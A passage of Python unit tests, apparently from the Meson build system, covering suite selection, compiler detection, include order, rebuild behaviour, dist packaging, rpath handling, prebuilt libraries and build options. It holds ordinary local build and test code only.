mydefault_log = f.read()
# Run tests with another setup
self._run(self.mtest_command + ['--setup=other'])
with open(os.path.join(self.logdir, 'testlog-other.txt')) as f:
other_log = f.read()
self.assertTrue('ENV_A is 1' in default_log)
self.assertTrue('ENV_B is 2' in default_log)
self.assertTrue('ENV_C is 2' in default_log)
self.assertTrue('ENV_A is 1' in mydefault_log)
self.assertTrue('ENV_B is 2' in mydefault_log)
self.assertTrue('ENV_C is 2' in mydefault_log)
self.assertTrue('ENV_A is 1' in other_log)
self.assertTrue('ENV_B is 3' in other_log)
self.assertTrue('ENV_C is 2' in other_log)
def assertFailedTestCount(self, failure_count, command):
try:
self._run(command)
self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
except subprocess.CalledProcessError as e:
self.assertEqual(e.returncode, failure_count)
def test_suite_selection(self):
testdir = os.path.join(self.unit_test_dir, '4 suite selection')
self.init(testdir)
self.build()
self.assertFailedTestCount(4, self.mtest_command)
self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success'])
self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])
self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])
def test_build_by_default(self):
testdir = os.path.join(self.common_test_dir, '133 build by default')
self.init(testdir)
self.build()
genfile1 = os.path.join(self.builddir, 'generated1.dat')
genfile2 = os.path.join(self.builddir, 'generated2.dat')
exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
self.assertPathExists(genfile1)
self.assertPathExists(genfile2)
self.assertPathDoesNotExist(exe1)
self.assertPathDoesNotExist(exe2)
self.build(target=('fooprog' + exe_suffix))
self.assertPathExists(exe1)
self.build(target=('barprog' + exe_suffix))
self.assertPathExists(exe2)
def test_internal_include_order(self):
testdir = os.path.join(self.common_test_dir, '134 include order')
self.init(testdir)
execmd = fxecmd = None
for cmd in self.get_compdb():
if 'someexe' in cmd['command']:
execmd = cmd['command']
continue
if 'somefxe' in cmd['command']:
fxecmd = cmd['command']
continue
if not execmd or not fxecmd:
raise Exception('Could not find someexe and somfxe commands')
# Check include order for 'someexe'
incs = [a for a in split_args(execmd) if a.startswith("-I")]
self.assertEqual(len(incs), 9)
# target private dir
someexe_id = Target.construct_id_from_path("sub4", "someexe", "@exe")
self.assertPathEqual(incs[0], "-I" + os.path.join("sub4", someexe_id))
# target build subdir
self.assertPathEqual(incs[1], "-Isub4")
# target source subdir
self.assertPathBasenameEqual(incs[2], 'sub4')
# include paths added via per-target c_args: ['-I'...]
self.assertPathBasenameEqual(incs[3], 'sub3')
# target include_directories: build dir
self.assertPathEqual(incs[4], "-Isub2")
# target include_directories: source dir
self.assertPathBasenameEqual(incs[5], 'sub2')
# target internal dependency include_directories: build dir
self.assertPathEqual(incs[6], "-Isub1")
# target internal dependency include_directories: source dir
self.assertPathBasenameEqual(incs[7], 'sub1')
# custom target include dir
self.assertPathEqual(incs[8], '-Ictsub')
# Check include order for 'somefxe'
incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
self.assertEqual(len(incs), 9)
# target private dir
self.assertPathEqual(incs[0], '-Isomefxe@exe')
# target build dir
self.assertPathEqual(incs[1], '-I.')
# target source dir
self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
# target internal dependency correct include_directories: build dir
self.assertPathEqual(incs[3], "-Isub4")
# target internal dependency correct include_directories: source dir
self.assertPathBasenameEqual(incs[4], 'sub4')
# target internal dependency dep include_directories: build dir
self.assertPathEqual(incs[5], "-Isub1")
# target internal dependency dep include_directories: source dir
self.assertPathBasenameEqual(incs[6], 'sub1')
# target internal dependency wrong include_directories: build dir
self.assertPathEqual(incs[7], "-Isub2")
# target internal dependency wrong include_directories: source dir
self.assertPathBasenameEqual(incs[8], 'sub2')
def test_compiler_detection(self):
'''
Test that automatic compiler detection and setting from the environment
both work just fine. This is needed because while running project tests
and other unit tests, we always read CC/CXX/etc from the environment.
'''
gnu = mesonbuild.compilers.GnuCompiler
clang = mesonbuild.compilers.ClangCompiler
intel = mesonbuild.compilers.IntelGnuLikeCompiler
msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
ar = mesonbuild.linkers.ArLinker
lib = mesonbuild.linkers.VisualStudioLinker
langs = [('c', 'CC'), ('cpp', 'CXX')]
if not is_windows():
langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
env = get_fake_env(testdir, self.builddir, self.prefix)
for lang, evar in langs:
# Detect with evar and do sanity checks on that
if evar in os.environ:
ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(ecc.version)
elinker = env.detect_static_linker(ecc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop(evar)
# Very rough/strict heuristics. Would never work for actual
# compiler detection, but should be ok for the tests.
ebase = os.path.basename(evalue)
if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
self.assertIsInstance(ecc, gnu)
self.assertIsInstance(elinker, ar)
elif 'clang-cl' in ebase:
self.assertIsInstance(ecc, clangcl)
self.assertIsInstance(elinker, lib)
elif 'clang' in ebase:
self.assertIsInstance(ecc, clang)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('ic'):
self.assertIsInstance(ecc, intel)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('cl'):
self.assertIsInstance(ecc, msvc)
self.assertIsInstance(elinker, lib)
else:
raise AssertionError('Unknown compiler {!r}'.format(evalue))
# Check that we actually used the evalue correctly as the compiler
self.assertEqual(ecc.get_exelist(), split_args(evalue))
# Do auto-detection of compiler based on platform, PATH, etc.
cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(cc.version)
linker = env.detect_static_linker(cc)
# Check compiler type
if isinstance(cc, gnu):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, clangcl):
self.assertIsInstance(linker, lib)
self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
if isinstance(cc, clang):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
# This is clang, not clang-cl
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, intel):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XildAppleDynamicLinker)
elif is_windows():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.XildLinuxDynamicLinker)
if isinstance(cc, msvc):
self.assertTrue(is_windows())
self.assertIsInstance(linker, lib)
self.assertEqual(cc.id, 'msvc')
self.assertTrue(hasattr(cc, 'is_64'))
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
# If we're on Windows CI, we know what the compiler will be
if 'arch' in os.environ:
if os.environ['arch'] == 'x64':
self.assertTrue(cc.is_64)
else:
self.assertFalse(cc.is_64)
# Set evar ourselves to a wrapper script that just calls the same
# exelist + some argument. This is meant to test that setting
# something like `ccache gcc -pipe` or `distcc ccache gcc` works.
wrapper = os.path.join(testdir, 'compiler wrapper.py')
wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
wrappercc_s = ''
for w in wrappercc:
wrappercc_s += quote_arg(w) + ' '
os.environ[evar] = wrappercc_s
wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
# Check static linker too
wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
wrapperlinker_s = ''
for w in wrapperlinker:
wrapperlinker_s += quote_arg(w) + ' '
os.environ['AR'] = wrapperlinker_s
wlinker = env.detect_static_linker(wcc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop('AR')
# Must be the same type since it's a wrapper around the same exelist
self.assertIs(type(cc), type(wcc))
self.assertIs(type(linker), type(wlinker))
# Ensure that the exelist is correct
self.assertEqual(wcc.get_exelist(), wrappercc)
self.assertEqual(wlinker.get_exelist(), wrapperlinker)
# Ensure that the version detection worked correctly
self.assertEqual(cc.version, wcc.version)
if hasattr(cc, 'is_64'):
self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
testdir = os.path.join(self.common_test_dir, '137 c cpp and asm')
# Skip if building with MSVC
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
raise unittest.SkipTest('MSVC can\'t compile assembly')
self.init(testdir)
commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
for cmd in self.get_compdb():
# Get compiler
split = split_args(cmd['command'])
if split[0] == 'ccache':
compiler = split[1]
else:
compiler = split[0]
# Classify commands
if 'Ic-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-asm']['c'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Icpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Ic-cpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-cpp-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['c-cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
elif 'Icpp-c-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['cpp-c-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-c-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
else:
raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
# Check that .S files are always built with the C compiler
self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
# Check that the c-asm target is always linked with the C linker
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build c-asm.*: c_LINKER', contents)
self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
'''
Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
not LDFLAGS.
'''
testdir = os.path.join(self.common_test_dir, '136 get define')
define = 'MESON_TEST_DEFINE_VALUE'
# NOTE: this list can't have \n, ' or "
# \n is never substituted by the GNU pre-processor via a -D define
# ' and " confuse split_args() even when they are escaped
# % and # confuse the MSVC preprocessor
# !, ^, *, and < confuse lcc preprocessor
value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
for env_var in ['CPPFLAGS', 'CFLAGS']:
env = {}
env[env_var] = '-D{}="{}"'.format(define, value)
env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'.format(define)
self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
testdir = os.path.join(self.common_test_dir, '113 custom target capture')
self.init(testdir)
meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.wipe()
self.init(testdir)
meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.assertListEqual(meson_exe_dat1, meson_exe_dat2)
def test_source_changes_cause_rebuild(self):
'''
Test that changes to sources and headers cause rebuilds, but not
changes to unused files (as determined by the dependency file) in the
input files list.
'''
testdir = os.path.join(self.common_test_dir, '20 header in file list')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of header.h should rebuild everything
self.utime(os.path.join(testdir, 'header.h'))
self.assertRebuiltTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
'''
Test that in a custom target, changes to the input files, the
ExternalProgram, and any File objects on the command-line cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '60 custom header generator')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of these should rebuild everything
for f in ('input.def', 'makeheader.py', 'somefile.txt'):
self.utime(os.path.join(testdir, f))
self.assertRebuiltTarget('prog')
def test_source_generator_program_cause_rebuild(self):
'''
Test that changes to generator programs in the source tree cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '94 gen extra')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of generator should rebuild the executable
self.utime(os.path.join(testdir, 'srcgen.py'))
self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
'''
Test that static libraries can be built with LTO and linked to
executables. On Linux, this requires the use of gcc-ar.
https://github.com/mesonbuild/meson/issues/1646
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args='-Db_lto=true')
self.build()
self.run_tests()
def test_dist_git(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
self.dist_impl(_git_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def test_dist_hg(self):
if not shutil.which('hg'):
raise unittest.SkipTest('Mercurial not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
def hg_init(project_dir):
subprocess.check_call(['hg', 'init'], cwd=project_dir)
with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
print('[ui]', file=f)
print('username=Author Person <teh_coderz@example.com>', file=f)
subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)
try:
self.dist_impl(hg_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the hg files so cleaning up the dir
# fails sometimes.
pass
def test_dist_git_script(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
with tempfile.TemporaryDirectory() as tmpdir:
project_dir = os.path.join(tmpdir, 'a')
shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
project_dir)
_git_init(project_dir)
self.init(project_dir)
self.build('dist')
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def dist_impl(self, vcs_init):
# Create this on the fly because having rogue .git directories inside
# the source tree leads to all kinds of trouble.
with tempfile.TemporaryDirectory() as project_dir:
with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile:
ofile.write('''project('disttest', 'c', version : '1.4.3')
e = executable('distexe', 'distexe.c')
test('dist test', e)
''')
with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile:
ofile.write('''#include<stdio.h>
int main(int argc, char **argv) {
printf("I am a distribution test.\\n");
return 0;
}
''')
xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
zip_checksumfile = zip_distfile + '.sha256sum'
vcs_init(project_dir)
self.init(project_dir)
self.build('dist')
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
self.assertPathDoesNotExist(zip_distfile)
self.assertPathDoesNotExist(zip_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'zip'],
workdir=self.builddir)
self.assertPathExists(zip_distfile)
self.assertPathExists(zip_checksumfile)
def test_rpath_uses_ORIGIN(self):
'''
Test that built targets use $ORIGIN in rpath, which ensures that they
are relocatable and ensures that builds are reproducible since the
build directory won't get embedded into the built binaries.
'''
if is_windows() or is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.common_test_dir, '42 library chain')
self.init(testdir)
self.build()
for each in ('prog', 'subdir/liblib1.so', ):
rpath = get_rpath(os.path.join(self.builddir, each))
self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each))
if is_dragonflybsd():
# DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
# so ignore that.
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
rpaths = rpath.split(':')[1:]
else:
rpaths = rpath.split(':')
for path in rpaths:
self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
# These two don't link to anything else, so they do not need an rpath entry.
for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
rpath = get_rpath(os.path.join(self.builddir, each))
if is_dragonflybsd():
# The rpath should be equal to /usr/lib/gccVERSION
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
self.assertEqual(len(rpath.split(':')), 1)
else:
self.assertTrue(rpath is None)
def test_dash_d_dedup(self):
testdir = os.path.join(self.unit_test_dir, '9 d dedup')
self.init(testdir)
cmd = self.get_compdb()[0]['command']
self.assertTrue('-D FOO -D BAR' in cmd or
'"-D" "FOO" "-D" "BAR"' in cmd or
'/D FOO /D BAR' in cmd or
'"/D" "FOO" "/D" "BAR"' in cmd)
def test_all_forbidden_targets_tested(self):
'''
Test that all forbidden targets are tested in the '154 reserved targets'
test. Needs to be a unit test because it accesses Meson internals.
'''
testdir = os.path.join(self.common_test_dir, '154 reserved targets')
targets = mesonbuild.coredata.forbidden_target_names
# We don't actually define a target with this name
targets.pop('build.ninja')
# Remove this to avoid multiple entries with the same name
# but different case.
targets.pop('PHONY')
for i in targets:
self.assertPathExists(os.path.join(testdir, i))
def detect_prebuild_env(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
stlinker = env.detect_static_linker(cc)
if mesonbuild.mesonlib.is_windows():
object_suffix = 'obj'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_cygwin():
object_suffix = 'o'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_osx():
object_suffix = 'o'
shared_suffix = 'dylib'
else:
object_suffix = 'o'
shared_suffix = 'so'
return (cc, stlinker, object_suffix, shared_suffix)
def pbcompile(self, compiler, source, objectfile, extra_args=None):
cmd = compiler.get_exelist()
extra_args = extra_args or []
if compiler.get_argument_syntax() == 'msvc':
cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args
else:
cmd += ['-c', source, '-o', objectfile] + extra_args
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def test_prebuilt_object(self):
(compiler, _, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
source = os.path.join(tdir, 'source.c')
objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix)
self.pbcompile(compiler, source, objectfile)
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(objectfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = ['lib', '/NOLOGO', '/OUT:' + outfile, objectfile]
else:
link_cmd = ['ar', 'csr', outfile, objectfile]
link_cmd = linker.get_exelist()
link_cmd += linker.get_always_args()
link_cmd += linker.get_std_link_args()
link_cmd += linker.get_output_args(outfile)
link_cmd += [objectfile]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_static_lib(self):
(cc, stlinker, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
source = os.path.join(tdir, 'libdir/best.c')
objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix)
stlibfile = os.path.join(tdir, 'libdir/libbest.a')
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = compiler.get_linker_exelist() + [
'/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
'/OUT:' + outfile, objectfile]
else:
if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
extra_args += ['-fPIC']
link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
if not mesonbuild.mesonlib.is_osx():
link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_shared_lib(self):
(cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
source = os.path.join(tdir, 'alexandria.c')
objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
impfile = os.path.join(tdir, 'alexandria.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
elif is_cygwin():
shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
else:
shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(tdir, 'alexandria.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_static(self):
'''
Test that the we prefer static libraries when `static: true` is
passed to dependency() with pkg-config. Can't be an ordinary test
because we need to build libs and try to find them from meson.build
Also test that it's not a hard error to have unsatisfiable library deps
since system libraries -lm will never be found statically.
https://github.com/mesonbuild/meson/issues/2785
'''
(cc, stlinker, objext, shext) = self.detect_prebuild_env()
testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
source = os.path.join(testdir, 'foo.c')
objectfile = os.path.join(testdir, 'foo.' + objext)
stlibfile = os.path.join(testdir, 'libfoo.a')
impfile = os.path.join(testdir, 'foo.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(testdir, 'foo.' + shext)
elif is_cygwin():
shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
else:
shlibfile = os.path.join(testdir, 'libfoo.' + shext)
# Build libs
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run test
try:
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(testdir, 'foo.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_gen_escaping(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
prefix = '/usr/with spaces'
libdir = 'lib'
self.init(testdir, extra_args=['--prefix=' + prefix,
'--libdir=' + libdir])
# Find foo dependency
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
# Ensure link_args are properly quoted
libdir = PurePath(prefix) / PurePath(libdir)
link_args = ['-L' + libdir.as_posix(), '-lfoo']
self.assertEqual(foo_dep.get_link_args(), link_args)
# Ensure include args are properly quoted
incdir = PurePath(prefix) / PurePath('include')
cargs = ['-I' + incdir.as_posix()]
self.assertEqual(foo_dep.get_compile_args(), cargs)
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
def opt_has(self, name, value):
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
def test_free_stringarray_setting(self):
